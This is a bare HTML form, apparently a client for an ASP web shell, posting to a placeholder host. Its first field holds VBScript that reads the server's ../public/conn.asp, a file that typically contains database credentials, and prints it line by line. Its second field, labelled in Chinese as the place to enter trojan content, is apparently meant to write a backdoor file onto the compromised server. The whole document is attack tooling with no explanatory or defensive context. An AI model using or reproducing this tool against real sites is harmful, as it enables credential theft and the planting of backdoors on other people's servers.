<form action=http://www.xxxx.com/a.asp method=post> <textarea name=value cols=120 rows=10 width=45> dim fso Set FSO = Server.CreateObject("Scripting.FileSystemObject") File = Server.MapPath("../public/conn.asp")
n=0 If FSO.FileExists(File) = True Then '判断该文件是否存在
Set CTF=FSO.OpenTextFile(File,1,False,TristateFalse) do while not(ctf.AtEndOfStream) response.write "<br>-------" response.write CTF.ReadLine response.write "<br>------" loop End If set ctf=nothing set fso=nothing </textarea> <textarea name=fhod cols=120 rows=10 width=45>添入生成木马的内容</textarea><BR><center><br> <input type=submit value=提交> </form>